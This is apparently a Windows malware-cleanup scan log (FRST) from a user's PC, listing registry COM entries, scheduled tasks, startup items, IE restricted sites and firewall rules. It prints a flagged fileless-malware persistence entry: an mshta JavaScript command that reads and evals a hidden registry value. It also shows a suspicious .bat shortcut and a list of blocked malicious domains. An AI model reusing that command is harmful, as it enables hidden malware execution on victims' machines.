CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.135\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.99\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.57\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.69\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.2.183.39\goopdate.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.79\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.7\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.1\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.145\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.123\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.153\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.149\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.22.3\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.165\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}\localserver32 -> C:\Users\Pat\AppData\Local\Temp\{e9513610-f218-4dda-b954-2c7e6ba7cabb}\IDriver.NonElevated.exe => No (the data entry has 5 more characters).
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.9\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.115\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.15\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.65\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{e3e02f12-2adb-478c-8742-5f0819f9f0f4}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{e473a65c-8087-49a3-affd-c5bc4a10669b}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.111\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{fc345d4c-b8f4-4674-bff7-3c37d2e535ee}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{fd6484ed-ebe3-4c3d-938a-8238003b41b7}\InprocServer32 -> C:\Users\Pat\AppData\Roaming\Move Networks\ie_bin\qsp2ie071101000055.dll (Move Networks)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0783D653-81CB-4EB7-9BF2-44E64A959208} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-08-30] (Microsoft Corporation)
Task: {11E5E48C-60CE-4F69-AB9C-55902607F096} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-06-28] (Google Inc.)
Task: {28152975-90B7-42E7-900C-091DDD46CB7E} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {3900F76A-BCC4-4FB8-B104-51861E74D948} - System32\Tasks\Microsoft\Support\Microsoft Fix it Center\OSUpgrade => Rundll32.exe "C:\Program Files\Microsoft Fix it Center\MatsApi.dll",RunHandleOSUpgrade
Task: {407F21CB-176E-40A8-8878-3ECD32214AA5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-26] (Adobe Systems Incorporated)
Task: {449AF0AB-6C8C-4675-9FD5-C5C890DA834E} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {45FBB47F-F6F7-43CE-94DB-CDF28E43E4FC} - System32\Tasks\Carbonite Upgrade Check => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {53D7B34F-D449-492F-8394-5B7E046BF41C} - \WSE_Astromenda -> No File <==== ATTENTION
Task: {679EF4BB-95C3-4392-AF16-C94957978289} - System32\Tasks\Microsoft\Support\Microsoft Fix it Center\MatSvc\DataUpload => Rundll32.exe "C:\Program Files\Microsoft Fix it Center\MatsApi.dll",RetryDataUpload
Task: {7171F06B-F052-4B66-B6A5-5618A65B22ED} - System32\Tasks\Microsoft\Support\Microsoft Fix it Center\ConfigExec => Rundll32.exe "C:\Program Files\Microsoft Fix it Center\MatsApi.dll",RunCollectConfigurationInfo
Task: {82FC81EA-BCD9-4597-A14B-8051DBEA3BDC} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {95DC1577-049A-4B7F-88DE-4911135A0D63} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A18C78E6-C847-4D5A-85EC-770CB8AA2D4D} - System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {A3E0A471-C27C-4AAE-B542-079E2E3782FC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000UA => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe [2015-02-03] (Google Inc.)
Task: {B00FEF82-3B58-4B73-A852-61A16791FB08} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe [2015-02-03] (Google Inc.)
Task: {BDCE1C65-6F94-44CA-BF30-F75979A46AB2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000Core => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe [2015-02-03] (Google Inc.)
Task: {C3E090CF-BD96-4F43-AB76-33A8EE54D044} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {C73B4774-0928-4F97-9216-AB5AAA57715E} - System32\Tasks\{B508F217-138C-48EB-9D03-FF866B98E7D9} => pcalua.exe -a C:\PROGRA~1\INFOGR~1\DIRTTR~1\UNWISE.EXE -c C:\PROGRA~1\INFOGR~1\DIRTTR~1\INSTALL.LOG
Task: {CE0B4C58-882E-4A0E-B554-78B4505D35A4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-06-28] (Google Inc.)
Task: {D3D6E07E-F230-436F-BC3A-E341DA71B486} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-09-14] (Adobe Systems Incorporated)
Task: {D7533266-6245-4CE7-AA8D-F820C0132E6A} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-05-08] (Hewlett-Packard Co.)
Task: {EE407D49-773A-4E7A-AEEF-2FF2F2312DD4} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-598873941-3244639055-2830076859-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Google Software Updater.job => C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000.job => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000Core.job => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000UA.job => C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Pat\AppData\Local\d102cc\256774.lnk -> C:\Users\Pat\AppData\Local\d102cc\bd3b7a.bat ()
 
ShortcutWithArgument: C:\Users\Pat\Documents\Documents\Documents\Documents\Documents\Desktop\Default Profile - Chrome.lnk -> C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
 
==================== Loaded Modules (Whitelisted) ==============
 
2007-11-27 09:29 - 2007-04-10 06:18 - 00159744 _____ () C:\Windows\system32\atitmmxx.dll
2016-09-06 17:32 - 2016-09-06 12:00 - 05197312 _____ () C:\Users\Pat\AppData\Local\Google\Chrome\User Data\SwiftShader\3.3.0.1\libglesv2.dll
2016-09-06 17:32 - 2016-09-06 12:00 - 00147456 _____ () C:\Users\Pat\AppData\Local\Google\Chrome\User Data\SwiftShader\3.3.0.1\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\vetsecure.com -> hxxps://www.vetsecure.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1-extreme.biz -> www.1-extreme.biz
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1001-search.info -> www.1001-search.info
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\123topsearch.com -> www.123topsearch.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\132.com -> www.132.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\136136.net -> down.136136.net
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\139mm.com -> www.139mm.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\163ns.com -> ert0003.e76.163ns.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\17-plus.com -> 17-plus.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\171203.com -> 171203.com
IE restricted site: HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\1800searchonline.com -> www.1800searchonline.com
 
There are 4121 more sites.
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 03:23 - 2006-09-18 14:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1       localhost
::1             localhost
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Pat\Documents\Pictures\Pictures\New England 2013\IMG_8070.JPG
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: aawservice => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AERTFilters => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: Ati External Event Utility => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BthServ => 2
MSCONFIG\Services: CCALib8 => 2
MSCONFIG\Services: DSBrokerService => 3
MSCONFIG\Services: Garmin Core Update Service => 2
MSCONFIG\Services: GoogleDesktopManager => 3
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: GoToAssist Remote Support Customer => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 2
MSCONFIG\Services: IDriverT => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: LavasoftAdAwareService11 => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Roxio UPnP Renderer 9 => 3
MSCONFIG\Services: Roxio Upnp Server 9 => 2
MSCONFIG\Services: RoxLiveShare9 => 2
MSCONFIG\Services: RoxMediaDB9 => 3
MSCONFIG\Services: RoxWatch9 => 2
MSCONFIG\Services: SBSDWSCService => 2
MSCONFIG\Services: sprtsvc_dellsupportcenter => 2
MSCONFIG\Services: stllssvr => 3
MSCONFIG\Services: XAudioService => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^aa_patch.exe => C:\Windows\pss\aa_patch.exe.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Desktop Manager.lnk => C:\Windows\pss\Desktop Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk => C:\Windows\pss\Digital Line Detect.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk => C:\Windows\pss\hpoddt01.exe.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^WinZip Quick Pick.lnk => C:\Windows\pss\WinZip Quick Pick.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Pat^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Pat^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Stickies.lnk => C:\Windows\pss\Stickies.lnk.Startup
MSCONFIG\startupreg: Ad-Aware Browsing Protection => "C:\ProgramData\Ad-Aware Browsing Protection\adawarebp.exe"
MSCONFIG\startupreg: AdAwareTray => "C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.1.5354.0\AdAwareTray.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\Pat\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: Crypted => C:\Users\Pat\AppData\Local\Temp\a.txt
MSCONFIG\startupreg: Dell DataSafe Online => "C:\Program Files\Dell DataSafe Online\DataSafeOnline.exe" /m
MSCONFIG\startupreg: Dell DataSafe Scheduler => "C:\Program Files\Dell DataSafe Online\Bin\DataSafeOnlineScheduler.exe"
MSCONFIG\startupreg: DellSupport => "C:\Program Files\DellSupport\DSAgnt.exe" /startup
MSCONFIG\startupreg: DellSupportCenter => "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P dellsupportcenter
MSCONFIG\startupreg: dscactivate => "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe"
MSCONFIG\startupreg: ECenter => C:\Dell\E-Center\EULALauncher.exe
MSCONFIG\startupreg: ehTray.exe => C:\Windows\ehome\ehTray.exe
MSCONFIG\startupreg: GarminExpressTrayApp => "C:\Program Files\Garmin\Express Tray\ExpressTray.exe"
MSCONFIG\startupreg: Google Desktop Search => "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
MSCONFIG\startupreg: Google Update => "C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: HP Photosmart 6520 series (NET) => "C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN29D1534V05TZ:NW" -scfn "HP Photosmart 6520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: HP Software Update => C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpqSRMon => C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqSRMon.exe
MSCONFIG\startupreg: ISUSPM => "c:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -scheduler
MSCONFIG\startupreg: ISUSPM Startup => C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
MSCONFIG\startupreg: ISUSScheduler => "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RoxWatchTray => "C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe"
MSCONFIG\startupreg: RtHDVCpl => RtHDVCpl.exe
MSCONFIG\startupreg: SpybotSD TeaTimer => C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
MSCONFIG\startupreg: StartCCC => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SUPERAntiSpyware => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
MSCONFIG\startupreg: swg => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: TkBellExe => "c:\program files\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: WMPNSCFG => C:\Program Files\Windows Media Player\WMPNSCFG.exe
MSCONFIG\startupreg: Yahoo! Pager => "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [{C96874A2-F109-4925-BC68-8D0BFEC8B522}] => (Allow) C:\Program Files\Yahoo!\Yahoo! Music Jukebox\YahooMusicEngine.exe
FirewallRules: [{F0EA9D66-AAF9-4663-8CCB-0CA77476E1E4}] => (Allow) C:\Program Files\Yahoo!\Yahoo! Music Jukebox\YahooMusicEngine.exe
FirewallRules: [TCP Query User{17C87D63-64CB-4C32-88D9-3C868A06B2FB}C:\program files\internet explorer\iexplore.exe] => (Allow) C:\program files\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{81FD9328-5170-4A31-8CA5-79CC878DEC29}C:\program files\internet explorer\iexplore.exe] => (Allow) C:\program files\internet explorer\iexplore.exe
FirewallRules: [{AB56FAA4-3E85-473A-B28B-E381A916FAD8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B3E13F25-D2C2-4EFD-A5B6-FF0F9C96640E}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{728C0214-FB5A-4043-A43F-EB2D0E92F041}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{1DC76EB3-02AA-40CD-8DD9-17E4BC84151B}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{A4841D3A-514B-4925-A6F0-C81338DD4436}] => (Allow) C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{F7E2AAA9-D2F2-4EEE-80E3-E00A36BE450F}] => (Allow) C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{F6902A11-3DB9-4CD5-B2AA-55E6A6B75736}] => (Allow) C:\Program Files\Yahoo!\Messenger\YServer.exe
FirewallRules: [{1402C051-4849-4D1C-9928-9AA1DBF2AC63}] => (Allow) C:\Program Files\Yahoo!\Messenger\YServer.exe
FirewallRules: [{835A00BB-D154-4D88-9041-D47D3D7AB198}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
